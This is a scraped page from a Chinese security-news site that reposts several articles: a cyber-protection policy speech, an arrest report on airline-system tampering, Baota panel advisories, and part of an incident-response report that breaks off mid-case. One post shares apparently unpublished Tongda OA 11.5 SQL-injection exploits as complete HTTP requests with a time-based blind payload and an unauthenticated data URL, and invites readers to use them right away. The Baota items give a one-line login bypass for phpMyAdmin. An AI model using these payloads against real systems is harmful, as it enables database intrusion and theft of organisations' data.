微慑信息网

业界快讯 第10页

郭启全:以落实“两个制度”为主线全面加强网络安全综合防控体系建设

微慑管理员阅读(2129)

9月2日,在由公安部网络安全保卫局指导,公安部第三研究所、公安部第一研究所主办的网络安全等级保护和关键信息基础设施安全保护工作宣贯会上,公安部网络安全保卫局一级巡视员、副局长兼总工程师郭启全为大会致辞,并作题为《以落实“两个制度”为主线全面加强网络安全综合防控体系建设》的主题发言。
 

郭启全:以落实“两个制度”为主线全面加强网络安全综合防控体系建设

郭启全副局长重点解读了公安部《贯彻落实网络安全等级保护制度和关键信息基础设施安全保护制度的指导意见》,详细介绍了加强等级保护和关键信息基础设施安全保护的基本原则、工作目标和具体措施,提出按照国家“一带一路”重大战略举措要求,实施“一带一路”网络安全战略,并学习借鉴发达国家成熟经验,在网络安全领域引入保险机制,提高网络安全风险治理能力。
 
指导思想、基本原则和工作目标

 

(一)指导思想
  • 以贯彻落实网络安全等级保护制度和关键信息基础设施安全保护制度为基础
  • 以保护关键信息基础设施、重要网络和数据安全为重点,切实加强保卫、保护和保障
  • 全面加强网络安全防范管理、监测预警、应急处置、侦查打击等各项措施,及时监测、处置网络安全风险和威胁
  • 依法惩治网络违法犯罪活动,切实提高网络安全保护能力
  • 积极构建国家网络安全综合防控体系,切实维护国家网络空间主权、国家安全和社会公共利益
  • 保护人民群众的合法权益,保障和促进经济社会信息化健康发展。

     

(二)基本原则
  • 坚持分等级保护、突出重点。重点保障关键信息基础设施、第三级以上网络、重要数据安全。
  • 坚持积极防御、综合防护。充分利用人工智能、大数据分析等技术,强化安全监测、态势感知、通报预警和应急处置等重点工作。
  • 坚持依法保护,形成合力。公安机关依法履行保卫和监管职责,行业主管部门履行本行业主管、监管责任,落实网络运营者主体防护责任。
(三)工作目标
  • 网络安全等级保护制度深入贯彻实施。网络安全等级保护定级备案、等级测评、安全建设和检查等基础工作深入推进。网络安全保护“实战化、体系化、常态化”和“动态防御、主动防御、纵深防御、精准防护、整体防控、联防联控”的“三化六防”措施得到有效落实,网络安全保护良好生态基本建立。

     

     

  • 关键信息基础设施安全保护制度建立实施。关键信息基础设施底数清晰,安全保护机构健全、职责明确、保障有力。在贯彻落实网络安全等级保护制度的基础上,关键岗位人员管理、供应链安全、数据安全、应急处置等重点安全保护措施得到有效落实,关键信息基础设施安全防护能力明显增强。
  • 网络安全监测预警和应急处置能力显著提升。跨行业、跨部门、跨地区的立体化网络安全监测体系和网络安全保护平台基本建成,网络安全态势感知、通报预警和事件发现处置能力明显提高。网络安全预案科学齐备,应急处置机制完善,应急演练常态化开展,网络安全重大事件得到有效防范、遏制和处置。

     

  • 网络安全综合防控体系基本形成。网络安全保护工作机制健全完善,党委统筹领导、各部门分工负责、社会力量多方参与的工作格局进一步完善。网络安全责任制得到有效落实,网络安全管理防范、监督指导和侦查打击等能力显著提升,“打防管控”一体化的网络安全综合防控体系基本形成。
(四)落实“四新”要求
  • 新目标:构建国家网络安全综合防控体系
  • 新理念:实战化、体系化、常态化
  • 新举措:动态防御、主动防御、纵深防御、精准防护、整体防控、联防联控
  • 新高度:国家网络安全综合防御能力和水平上升一个新高度

     

深入贯彻实施国家网络安全等级保护制度

 

按照国家网络安全等级保护制度要求,各单位、各部门在公安机关指导监督下,认真组织、深入开展网络安全等级保护工作,建立良好的网络安全保护生态,切实履行主体责任,全面提升网络安全保护能力。

(一)深化网络定级备案工作
  • 全面梳理本单位各类网络,特别是云计算、物联网、新型互联网、大数据、智能制造等新技术应用的基本情况。
  • 科学确定网络的安全保护等级。
  • 对第二级以上网络依法向公安机关备案,并向行业主管部门报备。
  • 对新建网络,应在规划设计阶段确定安全保护等级。
  • 公安机关进行备案审核。
(二)定期开展网络安全等级测评
  • 依据《网络安全等级保护测评要求》等有关标准,对网络进行检测评估,查找可能存在的网络安全问题和隐患。
  • 第三级以上网络运营者应委托等级测评机构,每年开展一次网络安全等级测评。
  • 新建第三级以上网络应在通过等级测评后投入运行。
  • 公安机关加强对等级测评机构的监督管理。
(三)科学开展安全建设整改
  • 落实“同步规划、同步建设、同步使用”三同步要求。
  • 依据《网络安全等级保护基本要求》《网络安全等级保护安全设计技术要求》等国家标准,按照“一个中心、三重防护”要求,应用可信计算等新技术开展安全建设和整改加固,提高内生安全、主动免疫、主动防御能力。
  • 可将网络系统迁移上云,或将网络安全服务外包,利用云服务商和网络安全服务商提升保护能力和水平。
  • 完善人员管理、教育培训、系统建设和运维等管理制度。
(四)强化安全责任落实
  • 行业主管部门、网络运营者应依据《网络安全法》等法律法规和中央关于网络安全工作责任制要求,建立网络安全等级保护工作责任制,落实责任追究制度,做到“守土有责、守土尽责”。
  • 网络运营者要定期组织专门力量开展网络安全自查和检测评估,行业主管部门要组织风险评估,及时发现网络安全隐患和薄弱环节并予以整改。

     

     

(五)加强供应链安全管理
  • 应加强网络关键人员的安全管理,第三级以上网络运营者应对为其提供设计、建设、运维、技术服务的机构和人员加强管理,评估风险,并采取相应的管控措施。
  • 应加强网络运维管理,因业务需要确需通过互联网远程运维的,应进行评估论证,并采取相应的管控措施。
  • 应采购、使用符合国家法律法规和有关标准要求的网络产品及服务,积极应用安全可信的网络产品及服务。
(六)落实密码安全防护要求
  • 应贯彻落实《密码法》等有关法律法规规定和密码应用相关标准规范。
  • 第三级以上网络应正确、有效采用密码技术进行保护,并使用符合相关要求的密码产品和服务。
  • 第三级以上网络运营者应在网络规划、建设和运行阶段,按照密码应用安全性评估管理办法和相关标准,在网络安全等级测评中同步开展密码应用安全性评估

 

建立并实施关键信息基础设施安全保护制度

 

公安机关指导监督关键信息基础设施安全保护工作。各单位、各部门应加强关键信息基础设施安全的法律体系、政策体系、标准体系、保护体系、保卫体系和保障体系建设,建立并实施关键信息基础设施安全保护制度,在落实网络安全等级保护制度基础上,强化保护措施,切实维护关键信息基础设施安全。
(一)组织认定关键信息基础设施
  • 公共通信和信息服务、能源、交通、水利、金融、公共服务、电子政务、国防科技工业等重要行业和领域的主管、监管部门(以下统称保护工作部门)应制定关键信息基础设施认定规则,并报公安部备案
  • 保护工作部门根据认定规则负责组织认定关键信息基础设施,及时将认定结果通知运营者,并报公安部
(二)明确关键信息基础设施安全保护工作职能分工
  • 公安部指导监督关键信息基础设施安全保护工作、会同相关部门加强顶层设计和规划部署,健全完善关保制度体系。
  • 保护工作部门负责本行业关保工作的组织领导,制定并实施关保总体规划和安全防护策略,落实指导监督责任。
  • 关基运营者负责设置专门安全管理机构,组织开展关保工作,主要负责人对本单位关保工作负总责。
(三)落实关键信息基础设施重点防护措施和实战措施
  • 关基运营者应依据等级保护标准开展安全建设并进行等级测评,发现问题和风险隐患要及时整改
  • 依据关键信息基础设施安全保护标准,加强安全保护和保障,并进行安全检测评估
  • 要梳理网络资产,建立资产档案,强化核心岗位人员管理、整体防护、监测预警、应急处置、数据保护等重点保护措施
  • 利用新技术开展网络安全保护,构建以密码技术、可信计算、人工智能、大数据分析等为核心的网络安全技术保护体系
  • 有条件的运营者应组建自己的安全服务机构,承担关键信息基础设施安全保护任务
  • 也可通过迁移上云或购买安全服务等方式,提高网络安全专业化、集约化保障能力。
落实实战措施:
  • 收敛互联网暴露面,加强攻击点管控
  • 梳理网络资产,开展重点防护和加固
  • 在关键节点架设监测设备,发现未知威胁
  • 布设第二代密罐、沙箱,诱捕网络攻击
  • 网络架构合理分区分域,加强纵深防御
  • 建立威胁情报共享机制,加强主动防御
  • 开展实战演习,提升攻防对抗能力
(四)加强重要数据和个人信息保护
  • 运营者应建立并落实重要数据和个人信息安全保护制度,采取身份鉴别、访问控制、密码保护、安全审计、安全隔离、可信验证等关键技术措施,切实保护重要数据全生命周期安全。
  • 研究新技术,架桥、加密、建模、应用,实现:数据不出门、可用不可见;不被我所有但为我所用。
  • 个人信息和重要数据应当在境内存储,确需向境外提供的,应当遵守有关规定并进行安全评估。
(五)强化核心岗位人员和产品服务的安全管理
  • 要对专门安全管理机构的负责人和关键岗位人员进行安全审查,加强管理。
  • 要对设计、建设、运行、维护等服务实施安全管理,采购安全可信的网络产品和服务,确保供应链安全。
  • 当采购产品和服务可能影响国家安全的,应按照国家有关规定通过安全审查。
  • 公安机关加强对关键信息基础设施安全服务机构的安全管理,为运营者开展安全保护工作提供支持。

实施“一带一路”网络安全战略

 

按照国家“一带一路”重大战略举措要求,实施“一带一路”网络安全战略,网络安全等级保护制度先行。在公安部指导下,国有企业与网络安全企业让“一带一路”国家共享中国网络安全等级保护政策、标准和经验,同时,保护中国企业在国外的网络基础设施和数据安全,保护企业生产业务安全,保护国家海外利益。

网络安全领域引入保险机制

 

 

借鉴发达国家成熟经验,在网络安全领域引入保险机制,是解决我国网络安全风险问题、提高网络安全风险治理能力的新途径。公安部会同有关部门推进。
 
重点工作:加强顶层设计,出台政策,支持网络安全保险业发展;研究网络安全保险法律、政策、标准规范,确保新机制落地;共同培育市场,试点先行,支持保险公司构建“保险+风险管控+服务”模式。
 

以上内容整理于网络安全等级保护和关键信息基础设施安全保护工作宣贯会

郭启全:以落实“两个制度”为主线全面加强网络安全综合防控体系建设
威努特简介
郭启全:以落实“两个制度”为主线全面加强网络安全综合防控体系建设

北京威努特技术有限公司(以下简称“威努特”), 是国内工控网络安全领军企业、全球六家荣获国际自动化协会安全合规学会ISASecure CRT Tool认证企业之一和亚太地区唯一国际自动化学会(ISA)全球网络安全联盟(GCA)创始成员。

威努特作为国家高新技术企业,以创新的“白环境”整体解决方案为核心,自主研发了全系列工控网络安全专用产品,拥有52项发明专利、50项软件著作权、52项原创漏洞证明等核心知识产权。积极牵头和参与工控网络安全领域国家、行业标准制定,受邀出色完成新中国70周年庆典、中共十九大、全国两会等重大活动的网络安保任务,被授予“国家重大活动网络安保技术支持单位”,得到了中央网信办、公安部、工信部等国家政府部门的高度认可。迄今已成功为电力、轨道交通、石油石化、军工、烟草、市政、智能制造、冶金等国家重要行业1000多家工业企业提供了全面有效的安全保障。

威努特始终以“专注工控,捍卫安全”为使命,致力于为我国关键信息基础设施网络空间安全保驾护航!

郭启全:以落实“两个制度”为主线全面加强网络安全综合防控体系建设

郭启全:以落实“两个制度”为主线全面加强网络安全综合防控体系建设
郭启全:以落实“两个制度”为主线全面加强网络安全综合防控体系建设
郭启全:以落实“两个制度”为主线全面加强网络安全综合防控体系建设
郭启全:以落实“两个制度”为主线全面加强网络安全综合防控体系建设
渠道合作咨询   张先生 18201311186
稿件合作   微信:shushu12121
郭启全:以落实“两个制度”为主线全面加强网络安全综合防控体系建设

原文始发于微信公众号(威努特工控安全):郭启全:以落实“两个制度”为主线全面加强网络安全综合防控体系建设

疫情期间入侵航空信息系统,篡改机票信息倒卖国际机票

微慑管理员阅读(1812)

记者8月28日从海口警方获悉

近日海口警方成功摧毁一个

以入侵航空信息系统篡改机票信息、

非法倒卖机票牟取暴利的犯罪团伙

抓获犯罪嫌疑人9人

扣押电脑14台、手机14部、

银行卡93张、汽车3辆

冻结涉案资金300余万元

抓了!疫情期间入侵航空信息系统,篡改机票信息倒卖国际机票

 

据警方通报,随着新冠肺炎疫情防控工作的推进,涉及疫情类犯罪手法也不断翻新。疫情期间,某航空公司在工作中发现中国民航信息系统被非法入侵、乘客航班日期被人为更改的情况。 

接到报案后,海口网警支队迅速立案,在省公安厅网警总队的指导下,开展了细致深入的调查工作,在此基础上,锁定了相关犯罪嫌疑人。

 

鉴于该案中嫌疑人利用疫情实施犯罪活动,为迅速破案积极回应人民群众关切,海口警方高度重视,立即成立由刑警支队牵头,秀英分局联合网警、经侦、禁毒支队等相关部门组成的专案组,对案件开展进一步调查,并逐渐梳理出一个破坏计算机信息系统,委托国内多个机票销售代理商工作人员违规办理国际机票票务,从中收取高额中介费的犯罪团伙。

 

抓了!疫情期间入侵航空信息系统,篡改机票信息倒卖国际机票

 

2020年7月20日至8月20日,专案组分赴湖南、广东、四川、浙江、青海、上海等地开展抓捕工作,成功抓获刘某军、黄某、王某等9名犯罪嫌疑人。

抓了!疫情期间入侵航空信息系统,篡改机票信息倒卖国际机票

 

经审查,犯罪嫌疑人刘某军系某航空公司辞职员工,其利用疫情期间国际航线机票紧缺、旅客急于回国的需求,伙同黄某通过盗用航空公司的账号和密码非法篡改中国民航信息系统中多家航空公司机票信息,并联系程某均、童某、谢某冉、仲某等国内多个机票销售代理违规办理国际机票票务,高价倒卖机票牟取暴利;犯罪嫌疑人王某系某航空公司辞职员工,其以与刘某军相同的方式,伙同李某、谢某勇、程某均等国内多个机票代理违规办理国际机票,并收取高额中介费,以此牟取暴利。

 

抓了!疫情期间入侵航空信息系统,篡改机票信息倒卖国际机票

 

目前,上述9名犯罪嫌疑人已被依法刑事拘留,案件正在进一步侦办中。

抓了!疫情期间入侵航空信息系统,篡改机票信息倒卖国际机票

来源:新海南客户端、南海网、南国都市报

记者:徐培培
编辑:粟蕾 翁翟

值班主任:韩静

原文始发于微信公众号(南国都市报):抓了!疫情期间入侵航空信息系统,篡改机票信息倒卖国际机票

最新宝塔服务器面板漏洞

微慑管理员阅读(4279)

 

0x00:影响范围

 

宝塔linux面板 7.4.2

宝塔windows面板 6.8

 

0x01:漏洞描叙

ip:888/pma
可以直接进入数据库,跳过验证操作数据库,从而拿到整站数据

最新宝塔服务器面板漏洞

0x02:漏洞点

宝塔<7.4.3 pma漏洞

/LinuxPanel-7.4.2/panel/class/common.py

7.4.3新增代码dirPath = '/www/server/phpmyadmin/pma'        if os.path.exists(dirPath):            public.ExecShell("rm -rf {}".format(dirPath)

LinuxPanel-7.4.2/panel/class/jobs.pypublic.ExecShell("rm -rf /www/server/phpmyadmin/pma")

 

最新宝塔服务器面板漏洞

0x03修复建议

升级到宝塔最新版(7.4.3)

最新宝塔服务器面板漏洞

最新宝塔服务器面板漏洞

原文始发于微信公众号(洛米唯熊):最新宝塔服务器面板漏洞

宝塔PMA未授权访问漏洞

微慑管理员阅读(3817)

宝塔PMA未授权访问漏洞

影响范围:

                宝塔linux 7.4.2

                宝塔windows 6.8

 

phpmyadmin无需登录,访问http://ip:888/pma【默认888,也可能修改成其他端口】,即可登录phpmyadmin,无需输入账号密码

               

原文始发于微信公众号(网络安全社区悦信安):宝塔PMA未授权访问漏洞

通达OA多枚0day漏洞分享

微慑管理员阅读(3044)

全网首发 | 通达OA多枚0day漏洞分享

以下文章来源于安译Sec ,作者tangshoupu

之前曝光过通达OA 0day我这里就不曝了,截止到发帖时,下面的漏洞都是未正式公开的。
影响范围:
我测试的是通达OA11.5版本,也就是2020年04月17日发布的,其他版未测,但我想也会有吧。

全网首发 | 通达OA多枚0day漏洞分享

HW这几天看到大家对通达OA的热情度很高,正好今天有空,下载了一个通达OA 11.5版本下来做代码审计,通达OA的代码是加密的,所以需要一个SeayDzend工具解密,百度上就能找到。

全网首发 | 通达OA多枚0day漏洞分享

解密后,对代码的各个模块都大致看了一下,很快就发现多处都存在SQL注入漏洞,仔细看了之前的曝光的文章,发现这些漏洞并未曝光,也未预警,也属于0day漏洞吧。
不多说,直接上POC,有需要的可以先拿到用了。

0x001 SQL注入 POC:


POST /general/appbuilder/web/calendar/calendarlist/getcallist HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36Referer: http://192.168.202.1/portal/home/Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ffConnection: keep-aliveHost: 192.168.43.169Pragma: no-cacheX-Requested-With: XMLHttpRequestContent-Length: 154X-WVS-ID: Acunetix-Autologin/65535Cache-Control: no-cacheAccept: */*Origin: http://192.168.43.169Accept-Language: en-US,en;q=0.9Content-Type: application/x-www-form-urlencoded; charset=UTF-8
starttime=AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---&endtime=1598918400&view=month&condition=1

全网首发 | 通达OA多枚0day漏洞分享

漏洞文件:webrootgeneralappbuildermodulescalendarmodelsCalendar.php
get_callist_data函数接收传入的begin_date变量未经过滤直接拼接在查询语句中造成注入。

全网首发 | 通达OA多枚0day漏洞分享

利用条件:
一枚普通账号登录权限,但测试发现,某些低版本也无需登录也可注入。

0x002 SQL注入 POC:
漏洞参数:orderby


GET /general/email/sentbox/get_index_data.php?asc=0&boxid=&boxname=sentbox&curnum=3&emailtype=ALLMAIL&keyword=sample%40email.tst&orderby=1&pagelimit=20&tag=&timestamp=1598069133&total= HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://192.168.43.169/Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ffAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflateHost: 192.168.43.169User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36Connection: close

全网首发 | 通达OA多枚0day漏洞分享

漏洞文件:webrootincutility_email.php,get_sentbox_data函数接收传入参数未过滤,直接拼接在order by后面了造成注入。

全网首发 | 通达OA多枚0day漏洞分享

利用条件:
一枚普通账号登录权限,但测试发现,某些低版本也无需登录也可注入。

0x003 SQL注入 POC:
漏洞参数:orderby


GET /general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=3--&pagelimit=10&tag=&timestamp=1598069103&total= HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://192.168.43.169Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ffAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflateHost: 192.168.43.169User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36Connection: close

全网首发 | 通达OA多枚0day漏洞分享

 

全网首发 | 通达OA多枚0day漏洞分享

漏洞文件:webrootincutility_email.php,get_email_data函数传入参数未过滤,直接拼接在order by后面了造成注入。

全网首发 | 通达OA多枚0day漏洞分享

利用条件:
一枚普通账号登录权限,但测试发现,某些低版本也无需登录也可注入。

0x004 SQL注入 POC:
漏洞参数:id

GET /general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://192.168.43.169Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ffAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflateHost: 192.168.43.169User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36Connection: close

全网首发 | 通达OA多枚0day漏洞分享

 

全网首发 | 通达OA多枚0day漏洞分享

漏洞文件:webrootgeneralappbuildermodulesreportcontrollersRepdetailController.phpactionEdit函数中存在 一个$_GET[“id”];  未经过滤,拼接到SQL查询中,造成了SQL注入。

全网首发 | 通达OA多枚0day漏洞分享

利用条件:
一枚普通账号登录权限,但测试发现,某些低版本也无需登录也可注入。

0x005 未授权访问:
未授权访问各种会议通知信息,POC链接:

http://127.0.0.1/general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=1597997506&view=agendaDay

 

全网首发 | 通达OA多枚0day漏洞分享

 

END.

 


 

欢迎转发~

欢迎关注~

欢迎点赞~

 

原文始发于微信公众号(弥天安全实验室):全网首发 | 通达OA多枚0day漏洞分享

《2020年上半年网络安全应急响应分析报告》全文

微慑管理员阅读(1909)

 

 

1、2020年上半年应急概况

 

2020年上半年,奇安信集团安服团队共参与和处置了全国范围内367起网络安全应急响应事件,第一时间协助用户处理安全事故,确保了用户门户网站、数据库和重要业务系统的持续安全稳定运行。

 

2020年月度统计情况具体如下:

 

在367起应急事件处置中,奇安信集团安服团队共投入工时5171小时,折合646.4人天,同比2019年上半年下降40.1%。工时下降原因主要有两点:

 

1)上半年受疫情影响,大部分政企机构的生产活动处于暂停或半暂停状态,客观上减少了安全事故的发生率。

 

2)2019年3月份,“永恒之蓝下载器”木马攻击事件全面爆发,2020年暂无突发性的、感染性较强的新型木马病毒出现。

 

《2020年上半年网络安全应急响应分析报告》全文

 

2、应急事件受害者分析

 

为进一步提高大中型政企机构应对突发安全事件的处置能力,增强政企机构安全防护意识,奇安信对上半年处置的所有应急事件从政企机构被攻击角度,对受害者行业分布、攻击事件发现方式、影响范围以及攻击行为造成的现象进行统计分析,直观呈现上半年政企机构内部网络安全情况。

 

一、行业现状分析

 

上半年应急处置事件最多的行业TOP3分别为:政府部门(69起)、医疗卫生(59起)、事业单位(39起),事件处置数分别为18.8%、16.1%、10.6%。

 

大中型政企机构应急行业分布TOP10详见下图:

 

《2020年上半年网络安全应急响应分析报告》全文

 

从上半年的行业现状分析来看,攻击者的攻击对象主要分布于政府机构、事业单位以及医疗行业,接近半数的应急事件均发生于上述三个行业。由此可见,上半年针对我国的网络攻击更具针对性。

 

二、事件发现分析

 

上半年,在奇安信安服团队参与处置的所有政府机构和企业的网络安全应急响应事件中,由用户单位自行发现的安全攻击事件占93.8%,其中被攻击者勒索后才发现被攻击达41.7%,另有6.2%的安全攻击事件政府机构和企业是在收到监管机构及第三方平台通报才得知已被攻击。

 

《2020年上半年网络安全应急响应分析报告》全文

 

从41.7%被攻击者勒索才发现事件可以看出,大中型政企机构仍然普遍缺乏足够的安全监测能力,很难自主发现那些隐蔽性较强的网络威胁。外部通报形式的发现方式占据了6.2%的比例,也从侧面反映出政企机构网络安全建设仍需持续完善,内部网络安全监测能力仍然有待提高。

 

三、影响范围分析

 

上半年应急响应事件的影响范围主要集中在业务专网69.8%,其次是办公终端30.2%。根据受影响区域分布对受影响设备数量进行了统计,在上半年失陷的设备中,有3070台办公终端受到影响,2777台服务器被攻陷。

 

《2020年上半年网络安全应急响应分析报告》全文

 

从影响范围和受影响设备数量可以看出,大中型政企机构的业务专网、办公终端为攻击者攻击的主要攻击目标。其中办公终端被攻陷数量较多,多为内部安全意识不足导致被攻击者轻易利用,进而对服务器、业务专网进行了进一步的攻击,常见如:攻击者利用员工安全意识的薄弱通过钓鱼邮件获取了办公终端的权限,进而内部投毒、横向扩散感染内部服务器,获取重要数据或者通过敲诈勒索的方式牟取非法暴利。

 

大中型政企机构应在强化业务专网的安全防护的同时,提高内部人员安全防范意识,加强对内网中办公终端、重要服务器的安全防护保障和数据安全管理。

 

四、攻击影响分析

 

上半年,大中型政企机构遭受攻击影响后果显示,攻击者对系统的攻击所产生的影响主要表现为数据丢失、系统/网络不可用、生产效率低下、数据被篡改等。

 

《2020年上半年网络安全应急响应分析报告》全文

 

上述数据中,导致数据丢失占比25.6%,攻击者通过对大中型政企机构重要服务器及数据库进行攻击,导致数据被破坏或丢失等后果;

 

系统/网络不可用占比22.1%,主要表现为攻击者通过对系统持续性攻击,直接造成业务系统宕机,网络不可用;

 

生产效率低下占比21.8%,攻击者主要通过挖矿、蠕虫、木马等病毒木马类的攻击手段使服务器CPU占用率异常高,造成生产效率低下;

 

同时,数据被篡改、声誉影响也是政企机构被攻击后产生的现象,造成的后果也是非常严重的。

 

3、应急事件攻击者分析

 

应急响应事件攻击者分析以上半年大中型政企机构所有应急数据为支撑,从攻击者角度对攻击者攻击意图、攻击类型攻击者常用木马以及攻击者常见漏洞利用方式进行分析,为各政企机构安全防护、制定应急处突方案提供参考依据。

 

一、攻击意图分析

 

上半年应急事件中,攻击者攻击意图主要为敲诈勒索、黑产活动、窃取重要数据和内部违规操作。

 

《2020年上半年网络安全应急响应分析报告》全文

 

内部违规中,内部人员为了方便工作或出于其他原因将内部业务端口映射至外网的违规操作需要引起大中型企业的重视。政企机构在完善整体安全防护体系建设时,应将内部员工网络安全意识作为重要模块进行培训,可以通过网络安全培训、定期举办攻防演习、应急演练等方式加强内部人员的网络安全意识。

 

二、攻击类型分析

 

通过对上半年大中型政企机构安全事件攻击类型进行分析,排名前三的类型分别是恶意程序58.6%、漏洞利用24.5%、钓鱼邮件5.2%。恶意程序中蠕虫病毒攻击占比61.4%,木马攻击(非蠕虫病毒)攻击占比38.6%。

 

《2020年上半年网络安全应急响应分析报告》全文

 

蠕虫病毒和木马,由于传播速度快、感染性强等特征成为最受攻击者青睐的攻击手段,攻击者利用病毒、木马对办公系统进行攻击,通常会产生大范围感染,造成系统不可用、数据损坏或丢失等现象。

 

漏洞利用则是攻击者利用政企机构网络安全建设不完善的弊端,使用常见系统漏洞、Web漏洞等,对服务器进行的破坏性攻击,通常会导致重要数据丢失、泄露、内部投毒、敲诈勒索等严重后果。

 

除此之外,钓鱼邮件、网页篡改、网络监听攻击等也是较为常见的攻击类型。因此,大中型政企机构应做好日常安全防范工作的同时,定期巡检,及时发现威胁并有效遏制。

 

三、恶意程序分析

 

上半年大中型政企机构安全事件遭受攻击恶意程序中,占比较多的木马病毒分别为勒索病毒51.6%、挖矿木马23.8%、一般木马10.5%。

 

《2020年上半年网络安全应急响应分析报告》全文

 

上半年最常见的勒索病毒是GlobeImposter、Wannacry、Phobos、Satan以及相关变种病毒。大中型政企机构应更清楚地认识到木马病毒对服务器、数据库所造成的严重损害,加强内部网络安全建设,针对多变种勒索病毒、挖矿木马以及随时可能出现的新型病毒制定完善的应急预案和安全防护措施,将应急常态化。

 

四、漏洞利用分析

 

上半年应急响应事件攻击类型中,对漏洞利用部分进行统计分析,发现弱口令、永恒之蓝漏洞是大中型政企机构被攻陷的重要原因,其次,服务器配置不当、服务器漏洞也经常作为攻击者日常利用的攻击手段。

 

《2020年上半年网络安全应急响应分析报告》全文

 

弱口令、永恒之蓝漏洞需要引起政企机构关注,全面的安全管理策略、内部漏洞检测和日常修复动作不容忽视。除弱口令、永恒之蓝漏洞以及服务器漏洞外,Web漏洞常见如:任意文件上传、SQL注入、JAVA反序列化也是攻击者最常利用的漏洞,攻击者通过利用某一漏洞入侵系统,传播病毒,获取重要数据以达到敲诈勒索、牟取暴利等意图。

 

政企机构应加大内部巡检力度,定期对设备、终端进行漏洞扫描、修复。定期更换服务器、终端登录密码、加大密码复杂度,不给攻击者任何可乘之机。

 

4、典型事件案例分析

 

上半年,奇安信安服团队接到的应急响应处置事件共涉及到了全国31个省市,23个行业,包括医疗卫生,大中型政企机构、事业单位等。发生的安全事件包括各种变种勒索病毒、挖矿木马、漏洞利用等,均不同程度的给大中型政企机构带来了经济损失和恶性的社会影响。

 

一、某客运公司员工敏感数据泄露致内网20多台机器受感染事件

 

(一) 事件概述

 

2月27日,奇安信安服团队接到某客运公司应急请求,该公司通过天眼发现存在服务器失陷的危急告警。

 

应急人员通过分析天眼发现,该公司内网环境中多达20余台服务器出现失陷告警,其中在人力资源服务器与财务服务器发现被植入的后门,服务器已沦陷,同时多台服务器上均发现Frp代理、CobaltStrike上线脚本与漏洞利用工具使用痕迹,攻击者正在通过Frp代理对内网服务器进行SQL注入漏洞攻击。

 

通过人工排查,发现该公司内部某员工上传敏感信息到GitHub中,导致敏感数据泄露,攻击者利用该员工账号登录VPN对该公司人力资源服务器发起攻击,并利用Redis未授权访问漏洞获得权限,上传Frp代理工具、MS17-010等漏洞利用工具,进行内网横向渗透,成功攻下内网服务器、主机20余台,并利用已攻陷机器在内网中进行横向攻击。

 

(二) 防护建议

 

1)定期进行内部人员安全意识培养,禁止将敏感信息私自暴露至公网,禁止点击来源不明的邮件附件等;

 

2)为Redis服务添加密码验证,为Redis服务创建单独的user和home目录,并且配置禁止登陆,低权限运行Redis服务;

 

3)加强日常安全巡检制度,定期对系统配置、系统漏洞、安全日志以及安全策略落实情况进行检查,及时修复漏洞(如MS17-010漏洞等)、安装补丁,将信息安全工作常态化;

 

4)建议配置VPN登录的双因素认证,如增加手机短信验证码认证等,严格控制用户登录,防止账号信息被盗用。

 

二、某大型企业挖矿木马事件处置

 

(一)事件概述

 

6月17日,奇安信安服团队接到某大型企业的应急响应请求,该企业服务器存在被种植挖矿木马病毒程序,态势感知出现病毒告警,要求对服务器后门进行排查,同时对攻击来源进行追溯。

 

应急人员经过排查,发现该企业内部已有38台服务器遭受SystemdMiner挖矿木马最新变种病毒的感染,存在内网横向传播的情况,且服务器中均未安装杀毒软件。通过对病毒样本和受感染机器的日志分析,确定攻击者利用该企业已存在未授权漏洞的堡垒机和官网服务器作为跳板机,获得了主机控制权限,上传SystemdMiner挖矿木马程序,并配置计划任务,定时连接矿池域名,又利用Consul rce /Hadoop rce /Jenkins rce/PostgreSQL rce、主机系统弱口令漏洞入侵IDC机房其他主机操作系统,利用自动化运维工具(salt/ansible/chef-knife)横向传播,利用失陷主机本地保存的 SSH 密钥传播自身,最终触发了态势感知病毒告警。

 

(二)防护建议

 

1)将已检测到的矿池相关非法域名,通过安全防护设置将其加入黑名单列表,并设置安全策略为阻断访问;

 

2)系统、应用相关用户杜绝使用弱口令,应使用高复杂强度的密码,加强内部人员安全意识,禁止密码重用的情况出现;

 

3)增强内部人员密码管理意识,禁止将密码进行本地保存;

 

4)建议安装防病毒软件,及时对病毒库进行更新,并且定期进行全面扫描,加强服务器上的病毒发现及清除能力;

 

5)加强日常安全巡检制度,定期对系统配置、系统漏洞、安全日志以及安全策略落实情况进行检查,及时修复漏洞、安装补丁,将信息安全工作常态化。

 

三、某政府单位服务器因SQL注入漏洞被攻陷事件

 

(一) 事件概述

 

6月3日,奇安信安服团队接到某政府单位应急响应请求,该单位员工在6月2日下午5点左右发现天眼存在SQL注入告警,需要上机排查服务器是否存在异常。

 
